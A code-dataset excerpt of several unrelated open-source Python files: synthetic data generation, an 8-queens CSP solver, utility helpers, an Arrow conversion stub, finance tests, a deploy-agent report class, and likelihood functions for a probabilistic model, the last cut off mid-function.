max_stars_repo_path (string, 4–245 chars) | max_stars_repo_name (string, 7–115 chars) | max_stars_count (int64, 101–368k) | id (string, 2–8 chars) | content (string, 6–1.03M chars)
---|---|---|---|---|
Python/Seaborn/generate_data.py | Gjacquenot/training-material | 115 | 12749472 |
#!/usr/bin/env python
import numpy as np
nr_data = 100
gaussian = np.random.normal(loc=1.5, scale=2.0, size=nr_data)
poisson = np.random.poisson(lam=5.0, size=nr_data)
labels = np.random.choice(['A', 'B', 'C', 'D'], size=nr_data)
x = np.linspace(0.0, 100.0, nr_data)
y = 1.3*x + 2.0 + np.random.normal(scale=8, size=nr_data)
x1 = np.random.choice(np.arange(1, 10, 1), size=nr_data)
y1 = 1.3*x1 + 2.0 + np.random.normal(scale=1.5, size=nr_data)
x2 = np.sort(np.random.gamma(3, scale=4, size=nr_data))
y2 = 1.3*x2 + 2.0 + np.random.normal(scale=1.5, size=nr_data)
binary = np.random.choice(np.array(['yes', 'no']), size=nr_data)
x3 = x2.copy()
y3 = np.where(binary == 'yes', 1.3, 1.9)*x3 + \
     np.where(binary == 'yes', 2.0, -1.0) + \
     np.random.normal(size=nr_data)
with open('Data/data.txt', 'w') as file:
    print('gaussian,poisson,label,x,y,x1,y1,x2,y2,binary,x3,y3', file=file)
    for i in range(nr_data):
        print(f'{gaussian[i]},{poisson[i]},{labels[i]},{x[i]},{y[i]},'
              f'{x1[i]},{y1[i]},{x2[i]},{y2[i]},{binary[i]},'
              f'{x3[i]},{y3[i]}',
              file=file)
|
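The script above writes a CSV-style file to `Data/data.txt`. A minimal sketch of how such a file might be loaded and visualised follows; the column names come from the header printed by the script, while the choice of plot and the use of pandas/seaborn/matplotlib are only illustrative assumptions, not part of the original training material.

```python
# Hedged sketch: load the generated file and draw one of the relationships.
# Assumes pandas, seaborn and matplotlib are installed; the plot choice is illustrative.
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt

data = pd.read_csv('Data/data.txt')
sns.scatterplot(data=data, x='x2', y='y2', hue='binary')  # column names from the header above
plt.show()
```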
Chapter3/queens.py | trenton3983/ClassicComputerScienceProblemsInPython | 792 | 12749494 |
# queens.py
# From Classic Computer Science Problems in Python Chapter 3
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from csp import Constraint, CSP
from typing import Dict, List, Optional
class QueensConstraint(Constraint[int, int]):
    def __init__(self, columns: List[int]) -> None:
        super().__init__(columns)
        self.columns: List[int] = columns

    def satisfied(self, assignment: Dict[int, int]) -> bool:
        # q1c = queen 1 column, q1r = queen 1 row
        for q1c, q1r in assignment.items():
            # q2c = queen 2 column
            for q2c in range(q1c + 1, len(self.columns) + 1):
                if q2c in assignment:
                    q2r: int = assignment[q2c]  # q2r = queen 2 row
                    if q1r == q2r:  # same row?
                        return False
                    if abs(q1r - q2r) == abs(q1c - q2c):  # same diagonal?
                        return False
        return True  # no conflict


if __name__ == "__main__":
    columns: List[int] = [1, 2, 3, 4, 5, 6, 7, 8]
    rows: Dict[int, List[int]] = {}
    for column in columns:
        rows[column] = [1, 2, 3, 4, 5, 6, 7, 8]
    csp: CSP[int, int] = CSP(columns, rows)
    csp.add_constraint(QueensConstraint(columns))
    solution: Optional[Dict[int, int]] = csp.backtracking_search()
    if solution is None:
        print("No solution found!")
    else:
        print(solution)
|
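`backtracking_search()` returns a column-to-row mapping (or `None`). The small sketch below re-applies the same row/diagonal rules as `QueensConstraint.satisfied()` to check such a mapping without needing the book's `csp` module; the sample assignment is just one valid 8-queens placement used for illustration.

```python
# Hedged sketch: independent check of a column -> row assignment for the 8-queens problem.
from itertools import combinations
from typing import Dict

def is_valid_solution(solution: Dict[int, int]) -> bool:
    for (c1, r1), (c2, r2) in combinations(solution.items(), 2):
        if r1 == r2 or abs(r1 - r2) == abs(c1 - c2):  # same row or same diagonal
            return False
    return True

print(is_valid_solution({1: 1, 2: 5, 3: 8, 4: 6, 5: 3, 6: 7, 7: 2, 8: 4}))  # True
```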
corehq/util/__init__.py | omari-funzone/commcare-hq | 471 | 12749515 | import json as stdlib_json # Don't conflict with `corehq.util.json`
from traceback import format_exception_only
from django.utils.functional import Promise
from .couch import get_document_or_404 # noqa: F401
from .view_utils import reverse # noqa: F401
def flatten_list(elements):
    return [item for sublist in elements for item in sublist]


def flatten_non_iterable_list(elements):
    # iterate over the list explicitly and keep non-list elements (such as strings)
    # intact, avoiding the conversion of strings to chars: ['abc'] => ['a', 'b', 'c']
    items = []
    for element in elements:
        if isinstance(element, list):
            items.extend(flatten_non_iterable_list(element))
        else:
            items.append(element)
    return items


def eval_lazy(value):
    if isinstance(value, Promise):
        value = value._proxy____cast()
    return value


def cmp(a, b):
    """Comparison function for Python 3

    https://stackoverflow.com/a/22490617/10840
    """
    return (a > b) - (a < b)


def as_text(value):
    """Safely convert object to text"""
    if isinstance(value, str):
        return value
    if isinstance(value, bytes):
        return value.decode("utf8", errors="backslashreplace")
    if isinstance(value, BaseException):
        lines = format_exception_only(type(value), value)
        return "\n".join(x.rstrip("\n") for x in lines)
    return repr(value)


def as_json_text(value):
    if value is None:
        return ''
    if isinstance(value, dict):
        try:
            return stdlib_json.dumps(value, indent=2)
        except TypeError:
            pass
    return as_text(value)
|
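The two flatten helpers above differ in how they treat non-list elements: `flatten_list` assumes every element is itself a list (a bare string would be iterated character by character), while `flatten_non_iterable_list` keeps strings and other non-list elements intact. A small sketch, assuming the commcare-hq package above is importable:

```python
# Hedged sketch: contrasting the two flatten helpers defined in corehq/util/__init__.py.
from corehq.util import flatten_list, flatten_non_iterable_list

nested = [['a', 'b'], 'cd', [['e'], 'f']]
print(flatten_non_iterable_list(nested))   # ['a', 'b', 'cd', 'e', 'f']
print(flatten_list([['a', 'b'], ['cd']]))  # ['a', 'b', 'cd']
```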
src/awkward/_v2/operations/convert/to_arrow.py | scikit-hep/awkward-1.0 | 519 | 12749541 |
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import distutils
import awkward as ak
np = ak.nplike.NumpyMetadata.instance()
def _import_pyarrow(name):  # move this to _util
    try:
        import pyarrow
    except ImportError:
        raise ImportError(
            """to use {0}, you must install pyarrow:
pip install pyarrow
or
conda install -c conda-forge pyarrow
""".format(
                name
            )
        )
    else:
        if distutils.version.LooseVersion(
            pyarrow.__version__
        ) < distutils.version.LooseVersion("5.0.0"):
            raise ImportError("pyarrow 5.0.0 or later required for {0}".format(name))
        return pyarrow


def to_arrow(
    array, list_to32=False, string_to32=True, bytestring_to32=True, allow_tensor=True
):
    pass
# """
# Args:
# array: Data to convert to an Apache Arrow array.
# list_to32 (bool): If True, convert Awkward lists into 32-bit Arrow lists
# if they're small enough, even if it means an extra conversion. Otherwise,
# signed 32-bit #ak.layout.ListOffsetArray maps to Arrow `ListType` and
# all others map to Arrow `LargeListType`.
# string_to32 (bool): Same as the above for Arrow `string` and `large_string`.
# bytestring_to32 (bool): Same as the above for Arrow `binary` and `large_binary`.
# allow_tensor (bool): If True, convert regular-length lists to `pyarrow.lib.Tensor`;
# otherwise, make `pyarrow.lib.ListArray` (generating offsets). This is used
# by #ak.to_parquet, since Parquet files can't contain regular-length tensors.
# Converts an Awkward Array into an Apache Arrow array.
# This produces arrays of type `pyarrow.Array`. You might need further
# manipulation (using the pyarrow library) to build a `pyarrow.ChunkedArray`,
# a `pyarrow.RecordBatch`, or a `pyarrow.Table`.
# Arrow arrays can maintain the distinction between "option-type but no elements are
# missing" and "not option-type" at all levels except the top level. Also, there is
# no distinction between `?union[X, Y, Z]` type and `union[?X, ?Y, ?Z]` type. Be
# aware of these type distinctions when passing data through Arrow or Parquet.
# See also #ak.from_arrow, #ak.to_arrow_table, #ak.to_parquet.
# """
# pyarrow = _import_pyarrow("ak.to_arrow")
# layout = to_layout(array, allow_record=False, allow_other=False)
# def recurse(layout, mask, is_option):
# if isinstance(layout, ak.layout.NumpyArray):
# numpy_arr = numpy.asarray(layout)
# length = len(numpy_arr)
# arrow_type = pyarrow.from_numpy_dtype(numpy_arr.dtype)
# if issubclass(numpy_arr.dtype.type, (bool, np.bool_)):
# if numpy_arr.ndim == 1:
# if len(numpy_arr) % 8 == 0:
# ready_to_pack = numpy_arr
# else:
# ready_to_pack = numpy.empty(
# int(numpy.ceil(len(numpy_arr) / 8.0)) * 8,
# dtype=numpy_arr.dtype,
# )
# ready_to_pack[: len(numpy_arr)] = numpy_arr
# ready_to_pack[len(numpy_arr) :] = 0
# numpy_arr = numpy.packbits(
# ready_to_pack.reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# else:
# return recurse(
# from_numpy(numpy_arr, regulararray=True, highlevel=False),
# mask,
# is_option,
# )
# if numpy_arr.ndim == 1:
# if mask is not None:
# return pyarrow.Array.from_buffers(
# arrow_type,
# length,
# [pyarrow.py_buffer(mask), pyarrow.py_buffer(numpy_arr)],
# )
# else:
# return pyarrow.Array.from_buffers(
# arrow_type, length, [None, pyarrow.py_buffer(numpy_arr)]
# )
# elif allow_tensor:
# return pyarrow.Tensor.from_numpy(numpy_arr)
# else:
# return recurse(
# from_numpy(numpy_arr, regulararray=True, highlevel=False),
# mask,
# is_option,
# )
# elif isinstance(layout, ak.layout.EmptyArray):
# return pyarrow.Array.from_buffers(pyarrow.null(), 0, [None])
# elif isinstance(layout, ak.layout.ListOffsetArray32):
# offsets = numpy.asarray(layout.offsets, dtype=np.int32)
# if layout.parameter("__array__") == "bytestring":
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.binary(),
# len(offsets) - 1,
# [
# None,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.binary(),
# len(offsets) - 1,
# [
# pyarrow.py_buffer(mask),
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# return arrow_arr
# if layout.parameter("__array__") == "string":
# if mask is None:
# arrow_arr = pyarrow.StringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# )
# else:
# arrow_arr = pyarrow.StringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# pyarrow.py_buffer(mask),
# )
# return arrow_arr
# content_buffer = recurse(layout.content[: offsets[-1]], None, False)
# content_type = pyarrow.list_(content_buffer.type).value_field.with_nullable(
# isinstance(
# ak.operations.describe.type(layout.content), ak.types.OptionType
# )
# )
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.list_(content_type),
# len(offsets) - 1,
# [None, pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.list_(content_type),
# len(offsets) - 1,
# [pyarrow.py_buffer(mask), pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# return arrow_arr
# elif isinstance(
# layout,
# (ak.layout.ListOffsetArray64, ak.layout.ListOffsetArrayU32),
# ):
# if layout.parameter("__array__") == "bytestring":
# downsize = bytestring_to32
# elif layout.parameter("__array__") == "string":
# downsize = string_to32
# else:
# downsize = list_to32
# offsets = numpy.asarray(layout.offsets)
# if downsize and offsets[-1] <= np.iinfo(np.int32).max:
# small_layout = ak.layout.ListOffsetArray32(
# ak.layout.Index32(offsets.astype(np.int32)),
# layout.content,
# parameters=layout.parameters,
# )
# return recurse(small_layout, mask, is_option)
# offsets = numpy.asarray(layout.offsets, dtype=np.int64)
# if layout.parameter("__array__") == "bytestring":
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_binary(),
# len(offsets) - 1,
# [
# None,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_binary(),
# len(offsets) - 1,
# [
# pyarrow.py_buffer(mask),
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# return arrow_arr
# if layout.parameter("__array__") == "string":
# if mask is None:
# arrow_arr = pyarrow.LargeStringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# )
# else:
# arrow_arr = pyarrow.LargeStringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# pyarrow.py_buffer(mask),
# )
# return arrow_arr
# content_buffer = recurse(layout.content[: offsets[-1]], None, False)
# content_type = pyarrow.list_(content_buffer.type).value_field.with_nullable(
# isinstance(
# ak.operations.describe.type(layout.content), ak.types.OptionType
# )
# )
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_list(content_type),
# len(offsets) - 1,
# [None, pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_list(content_type),
# len(offsets) - 1,
# [pyarrow.py_buffer(mask), pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# return arrow_arr
# elif isinstance(layout, ak.layout.RegularArray):
# return recurse(
# layout.broadcast_tooffsets64(layout.compact_offsets64()),
# mask,
# is_option,
# )
# elif isinstance(
# layout,
# (
# ak.layout.ListArray32,
# ak.layout.ListArrayU32,
# ak.layout.ListArray64,
# ),
# ):
# return recurse(
# layout.broadcast_tooffsets64(layout.compact_offsets64()),
# mask,
# is_option,
# )
# elif isinstance(layout, ak.layout.RecordArray):
# values = [
# recurse(x[: len(layout)], mask, is_option) for x in layout.contents
# ]
# min_list_len = min(map(len, values))
# types = pyarrow.struct(
# [
# pyarrow.field(layout.key(i), values[i].type).with_nullable(
# isinstance(ak.operations.describe.type(x), ak.types.OptionType)
# )
# for i, x in enumerate(layout.contents)
# ]
# )
# if mask is not None:
# return pyarrow.Array.from_buffers(
# types, min_list_len, [pyarrow.py_buffer(mask)], children=values
# )
# else:
# return pyarrow.Array.from_buffers(
# types, min_list_len, [None], children=values
# )
# elif isinstance(
# layout,
# (
# ak.layout.UnionArray8_32,
# ak.layout.UnionArray8_64,
# ak.layout.UnionArray8_U32,
# ),
# ):
# tags = numpy.asarray(layout.tags)
# index = numpy.asarray(layout.index)
# copied_index = False
# if mask is not None:
# bytemask = (
# numpy.unpackbits(mask)
# .reshape(-1, 8)[:, ::-1]
# .reshape(-1)
# .view(np.bool_)
# )[: len(tags)]
# values = []
# for tag, content in enumerate(layout.contents):
# selected_tags = tags == tag
# this_index = index[selected_tags]
# if mask is not None:
# length = int(numpy.ceil(len(this_index) / 8.0)) * 8
# if len(numpy.unique(this_index)) == len(this_index):
# this_bytemask = numpy.zeros(length, dtype=np.uint8)
# this_bytemask[this_index] = bytemask[selected_tags]
# else:
# this_bytemask = numpy.empty(length, dtype=np.uint8)
# this_bytemask[: len(this_index)] = bytemask[selected_tags]
# this_bytemask[len(this_index) :] = 0
# content = content[this_index]
# this_index = numpy.arange(len(this_index))
# if not copied_index:
# copied_index = True
# index = numpy.array(index, copy=True)
# index[selected_tags] = this_index
# this_mask = numpy.packbits(
# this_bytemask.reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# else:
# this_mask = None
# values.append(recurse(content, this_mask, is_option))
# types = pyarrow.union(
# [
# pyarrow.field(str(i), values[i].type).with_nullable(
# is_option
# or isinstance(layout.content(i).type, ak.types.OptionType)
# )
# for i in range(len(values))
# ],
# "dense",
# list(range(len(values))),
# )
# return pyarrow.Array.from_buffers(
# types,
# len(layout.tags),
# [
# None,
# pyarrow.py_buffer(tags),
# pyarrow.py_buffer(index.astype(np.int32)),
# ],
# children=values,
# )
# elif isinstance(
# layout,
# (
# ak.layout.IndexedArray32,
# ak.layout.IndexedArrayU32,
# ak.layout.IndexedArray64,
# ),
# ):
# index = numpy.asarray(layout.index)
# if layout.parameter("__array__") == "categorical":
# dictionary = recurse(layout.content, None, False)
# if mask is None:
# return pyarrow.DictionaryArray.from_arrays(index, dictionary)
# else:
# bytemask = (
# numpy.unpackbits(~mask)
# .reshape(-1, 8)[:, ::-1]
# .reshape(-1)
# .view(np.bool_)
# )[: len(index)]
# return pyarrow.DictionaryArray.from_arrays(
# index, dictionary, bytemask
# )
# else:
# layout_content = layout.content
# if len(layout_content) == 0:
# empty = recurse(layout_content, None, False)
# if mask is None:
# return empty
# else:
# return pyarrow.array([None] * len(index)).cast(empty.type)
# elif isinstance(layout_content, ak.layout.RecordArray):
# values = [
# recurse(x[: len(layout_content)][index], mask, is_option)
# for x in layout_content.contents
# ]
# min_list_len = min(map(len, values))
# types = pyarrow.struct(
# [
# pyarrow.field(
# layout_content.key(i), values[i].type
# ).with_nullable(
# isinstance(
# ak.operations.describe.type(x), ak.types.OptionType
# )
# )
# for i, x in enumerate(layout_content.contents)
# ]
# )
# if mask is not None:
# return pyarrow.Array.from_buffers(
# types,
# min_list_len,
# [pyarrow.py_buffer(mask)],
# children=values,
# )
# else:
# return pyarrow.Array.from_buffers(
# types, min_list_len, [None], children=values
# )
# else:
# return recurse(layout_content[index], mask, is_option)
# elif isinstance(
# layout,
# (ak.layout.IndexedOptionArray32, ak.layout.IndexedOptionArray64),
# ):
# index = numpy.array(layout.index, copy=True)
# nulls = index < 0
# index[nulls] = 0
# if layout.parameter("__array__") == "categorical":
# dictionary = recurse(layout.content, None, False)
# if mask is None:
# bytemask = nulls
# else:
# bytemask = (
# numpy.unpackbits(~mask)
# .reshape(-1, 8)[:, ::-1]
# .reshape(-1)
# .view(np.bool_)
# )[: len(index)]
# bytemask[nulls] = True
# return pyarrow.DictionaryArray.from_arrays(index, dictionary, bytemask)
# else:
# if len(nulls) % 8 == 0:
# this_bytemask = (~nulls).view(np.uint8)
# else:
# length = int(numpy.ceil(len(nulls) / 8.0)) * 8
# this_bytemask = numpy.empty(length, dtype=np.uint8)
# this_bytemask[: len(nulls)] = ~nulls
# this_bytemask[len(nulls) :] = 0
# this_bitmask = numpy.packbits(
# this_bytemask.reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# if isinstance(layout, ak.layout.IndexedOptionArray32):
# next = ak.layout.IndexedArray32(
# ak.layout.Index32(index), layout.content
# )
# else:
# next = ak.layout.IndexedArray64(
# ak.layout.Index64(index), layout.content
# )
# if mask is None:
# return recurse(next, this_bitmask, True)
# else:
# return recurse(next, mask & this_bitmask, True)
# elif isinstance(layout, ak.layout.BitMaskedArray):
# bitmask = numpy.asarray(layout.mask, dtype=np.uint8)
# if layout.lsb_order is False:
# bitmask = numpy.packbits(
# numpy.unpackbits(bitmask).reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# if layout.valid_when is False:
# bitmask = ~bitmask
# return recurse(layout.content[: len(layout)], bitmask, True).slice(
# length=min(len(bitmask) * 8, len(layout.content))
# )
# elif isinstance(layout, ak.layout.ByteMaskedArray):
# mask = numpy.asarray(layout.mask, dtype=np.bool_) == layout.valid_when
# bytemask = numpy.zeros(
# 8 * math.ceil(len(layout.content) / 8), dtype=np.bool_
# )
# bytemask[: len(mask)] = mask
# bytemask[len(mask) :] = 0
# bitmask = numpy.packbits(bytemask.reshape(-1, 8)[:, ::-1].reshape(-1))
# return recurse(layout.content[: len(layout)], bitmask, True).slice(
# length=len(mask)
# )
# elif isinstance(layout, (ak.layout.UnmaskedArray)):
# return recurse(layout.content, None, True)
# elif isinstance(layout, (ak.layout.VirtualArray)):
# return recurse(layout.array, None, False)
# elif isinstance(layout, (ak.partition.PartitionedArray)):
# return pyarrow.chunked_array(
# [recurse(x, None, False) for x in layout.partitions]
# )
# else:
# raise TypeError(
# "unrecognized array type: {0}".format(repr(layout))
# + ak._util.exception_suffix(__file__)
# )
# return recurse(layout, None, False)
|
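In this `_v2` snapshot, `to_arrow` is a stub (`pass`) with the earlier implementation kept as comments. Based on the commented docstring, a minimal sketch of the intended call pattern might look like the following; it assumes a released `awkward` version in which `ak.to_arrow` is implemented and `pyarrow >= 5.0.0` is installed, and the sample array is purely illustrative.

```python
# Hedged sketch of the call pattern described in the commented docstring above.
# Assumes an awkward release with a working ak.to_arrow and pyarrow >= 5.0.0.
import awkward as ak
import pyarrow as pa

ak_array = ak.Array([[1.1, 2.2, 3.3], [], [4.4, 5.5]])
pa_array = ak.to_arrow(ak_array)  # produces a pyarrow.Array
table = pa.Table.from_arrays([pa_array], names=["values"])  # further manipulation via pyarrow
print(table)
```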
tests/test_finance.py | GabrielWen/spartan | 156 | 12749542 | import unittest
import sys
import test_common
from spartan import expr, util
from spartan.expr import eager
from spartan.examples import finance
maturity = 10.0
rate = 0.005
volatility = 0.001
class TestFinance(test_common.ClusterTest):
    def setUp(self):
        if not hasattr(self, 'current'):
            self.current = eager(expr.abs(10 + expr.randn(10)))
            self.strike = eager(expr.abs(20 + expr.randn(10)))

    def test_call(self):
        put, call = finance.black_scholes(self.current, self.strike, maturity, rate, volatility)
        #util.log_info(call)
        util.log_info(call.glom())

    def test_put(self):
        put, call = finance.black_scholes(self.current, self.strike, maturity, rate, volatility)
        #util.log_info(put)
        #util.log_info(optimize(put))
        util.log_info(put.glom())

    def test_find_change(self):
        arr = expr.randn(100)
        movers = finance.find_change(arr)
        #util.log_info(optimize(movers))
        util.log_info(movers.glom())

    def test_print_graph(self):
        put, call = finance.black_scholes(self.current, self.strike, maturity, rate, volatility)
        #print(put.dot())

    def test_predict_price(self):
        bid = expr.randn(100)
        ask = expr.randn(100)
        res = finance.predict_price(bid, ask, 5).optimized()
        #print(res)
        #print(res.optimized())
        print(res.glom())


if __name__ == '__main__':
    unittest.main(argv=sys.argv[:1])
|
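The tests above call `finance.black_scholes(current, strike, maturity, rate, volatility)` and expect a `(put, call)` pair. For orientation, here is a minimal NumPy/SciPy sketch of the standard Black-Scholes prices; it is an illustration of the textbook formula presumably being tested, not the `spartan.examples.finance` implementation, and the argument names simply mirror the test variables.

```python
# Hedged sketch: standard Black-Scholes European put/call prices with NumPy/SciPy.
import numpy as np
from scipy.stats import norm

def black_scholes(current, strike, maturity, rate, volatility):
    """Return (put, call) prices for European options (textbook formula)."""
    d1 = (np.log(current / strike) + (rate + 0.5 * volatility ** 2) * maturity) \
         / (volatility * np.sqrt(maturity))
    d2 = d1 - volatility * np.sqrt(maturity)
    call = current * norm.cdf(d1) - strike * np.exp(-rate * maturity) * norm.cdf(d2)
    put = strike * np.exp(-rate * maturity) * norm.cdf(-d2) - current * norm.cdf(-d1)
    return put, call

# Example with the module-level constants used by the tests above.
put, call = black_scholes(current=10.0, strike=20.0, maturity=10.0, rate=0.005, volatility=0.001)
```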
deploy-agent/deployd/types/ping_report.py | brennentsmith/teletraan | 2,449 | 12749564 | # Copyright 2016 Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from deployd.types.deploy_stage import DeployStage
from deployd.types.agent_status import AgentStatus
class PingReport(object):

    def __init__(self, jsonValue=None):
        self.deployId = None
        self.envId = None
        self.envName = None
        self.stageName = None
        self.deployStage = None
        self.status = None
        self.errorCode = 0
        self.errorMessage = None
        self.failCount = 0
        self.extraInfo = None
        self.deployAlias = None

        if jsonValue:
            self.deployId = jsonValue.get('deployId')
            self.envId = jsonValue.get('envId')

            if isinstance(jsonValue.get('deployStage'), int):
                self.deployStage = DeployStage._VALUES_TO_NAMES[jsonValue.get('deployStage')]
            else:
                self.deployStage = jsonValue.get('deployStage')

            if isinstance(jsonValue.get('status'), int):
                self.status = AgentStatus._VALUES_TO_NAMES[jsonValue.get('status')]
            else:
                self.status = jsonValue.get('status')

            self.envName = jsonValue.get('envName')
            self.stageName = jsonValue.get('stageName')
            self.errorCode = jsonValue.get('errorCode')
            self.errorMessage = jsonValue.get('errorMessage')
            self.failCount = jsonValue.get('failCount')
            self.extraInfo = jsonValue.get('extraInfo')
            self.deployAlias = jsonValue.get('deployAlias')

    def __str__(self):
        return "PingReport(deployId={}, envId={}, deployStage={}, status={}, " \
               "errorCode={}, errorMessage={}, failCount={}, extraInfo={}, " \
               "deployAlias={})".format(self.deployId, self.envId, self.deployStage,
                                        self.status, self.errorCode, self.errorMessage,
                                        self.failCount, self.extraInfo, self.deployAlias)
|
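`PingReport` accepts either enum integers or their string names for `deployStage` and `status`. A small sketch of constructing one from a JSON-style dict follows; the concrete field values (ids, stage, status) are made-up placeholders for illustration, not values taken from Teletraan.

```python
# Hedged sketch: building a PingReport from a JSON-style dict.
# The deployId/envId/stage/status values below are illustrative only.
report = PingReport(jsonValue={
    'deployId': 'deploy-123',
    'envId': 'env-1',
    'envName': 'myapp',
    'stageName': 'prod',
    'deployStage': 'SERVING_BUILD',  # a string bypasses the int -> name lookup
    'status': 'SUCCEEDED',
    'errorCode': 0,
    'failCount': 0,
})
print(report)
```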
anglepy/funcs.py | strin/nips14-ssl | 496 | 12749593 | import numpy as np
import anglepy.ndict as ndict
# FuncLikelihood
class FuncLikelihood():
def __init__(self, x, model, n_batch):
self.x = x
self.model = model
self.n_batch = n_batch
self.n_datapoints = next(iter(x.values())).shape[1]
if self.n_datapoints % self.n_batch != 0:
print(self.n_datapoints, self.n_batch)
raise BaseException()
self.blocksize = self.n_batch
self.n_minibatches = self.n_datapoints // self.blocksize
def subval(self, i, w, z):
_x = ndict.getCols(self.x, i*self.n_batch, (i+1)*self.n_batch)
_z = ndict.getCols(z, i*self.n_batch, (i+1)*self.n_batch)
return self.model.logpxz(w, _x, _z)
def subgrad(self, i, w, z):
_x = ndict.getCols(self.x, i*self.n_batch, (i+1)*self.n_batch)
_z = ndict.getCols(z, i*self.n_batch, (i+1)*self.n_batch)
logpx, logpz, g, _ = self.model.dlogpxz_dwz(w, _x, _z)
return logpx, logpz, g
def val(self, w, z):
if self.n_minibatches==1: return self.subval(0, w, z)
logpx, logpz = tuple(zip(*[self.subval(i, w, z) for i in range(self.n_minibatches)]))
return np.hstack(logpx), np.hstack(logpz)
def grad(self, w, z):
if self.n_minibatches==1: return self.subgrad(0, w, z)
logpxi, logpzi, gwi, _ = tuple(zip(*[self.subgrad(i, w, z) for i in range(self.n_minibatches)]))
return np.hstack(logpxi), np.hstack(logpzi), ndict.sum(gwi)
# FuncPosterior
class FuncPosterior():
def __init__(self, likelihood, model):
self.ll = likelihood
self.model = model
self.n_minibatches = likelihood.n_minibatches
self.blocksize = likelihood.blocksize
def subval(self, i, w, z):
prior = self.model.logpw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
logpx, logpz = self.ll.subval(i, w, z)
return logpx.sum() + logpz.sum() + prior_weight * prior
def subgrad(self, i, w, z):
logpx, logpz, gw = self.ll.subgrad(i, w, z)
logpw, gw_prior = self.model.dlogpw_dw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
for j in gw: gw[j] += prior_weight * gw_prior[j]
return logpx.sum() + logpz.sum() + prior_weight * logpw, gw
def val(self, w, z={}):
logpx, logpz = self.ll.val(w, z)
return logpx.sum() + logpz.sum() + self.model.logpw(w)
def grad(self, w, z={}):
logpx, logpz, gw = self.ll.grad(w, z)
prior, gw_prior = self.model.dlogpw_dw(w)
for i in gw: gw[i] += gw_prior[i]
return logpx.sum() + logpz.sum() + prior, gw
# Parallel version of likelihood
# Before using, start ipython cluster, e.g.:
# shell>ipcluster start -n 4
from IPython.parallel.util import interactive
import IPython.parallel
class FuncLikelihoodPar():
def __init__(self, x, model, n_batch):
raise Exception("TODO")
self.x = x
self.c = c = IPython.parallel.Client()
self.model = model
self.n_batch = n_batch
self.clustersize = len(c)
print('ipcluster size = ' + str(self.clustersize))
n_train = next(iter(x.values())).shape[1]
if n_train % (self.n_batch*len(c)) != 0: raise BaseException()
self.blocksize = self.n_batch*len(c)
self.n_minibatches = n_train // self.blocksize
# Get pointers to slaves
c.block = False
# Remove namespaces on slaves
c[:].clear()
# Execute stuff on slaves
module, function, args = self.model.constr
c[:].push({'args':args,'x':x}).wait()
commands = [
'import os; cwd = os.getcwd()',
'import sys; sys.path.append(\'../shared\')',
'import anglepy.ndict as ndict',
'import '+module,
'my_n_batch = '+str(n_batch),
'my_model = '+module+'.'+function+'(**args)'
]
for cmd in commands: c[:].execute(cmd).get()
# Import data on slaves
for i in range(len(c)):
_x = ndict.getCols(x, i*(n_train/len(c)), (i+1)*(n_train/len(c)))
c[i].push({'my_x':_x})
c[:].pull(['my_x']).get()
def subval(self, i, w, z):
raise Exception("TODO")
# Replaced my_model.nbatch with my_n_batch, this is UNTESTED
@interactive
def ll(w, z, k):
_x = ndict.getCols(my_x, k*my_n_batch, (k+1)*my_n_batch) #@UndefinedVariable
if z == None:
return my_model.logpxmc(w, _x), None #@UndefinedVariable
else:
return my_model.logpxz(w, _x, z) #@UndefinedVariable
tasks = []
for j in range(len(self.c)):
_z = z
if _z != None:
_z = ndict.getCols(z, j*self.n_batch, (j+1)*self.n_batch)
tasks.append(self.c.load_balanced_view().apply_async(ll, w, _z, i))
res = [task.get() for task in tasks]
raise Exception("TODO: implementation with uncoupled logpx and logpz")
return sum(res)
def subgrad(self, i, w, z):
@interactive
def dlogpxz_dwz(w, z, k):
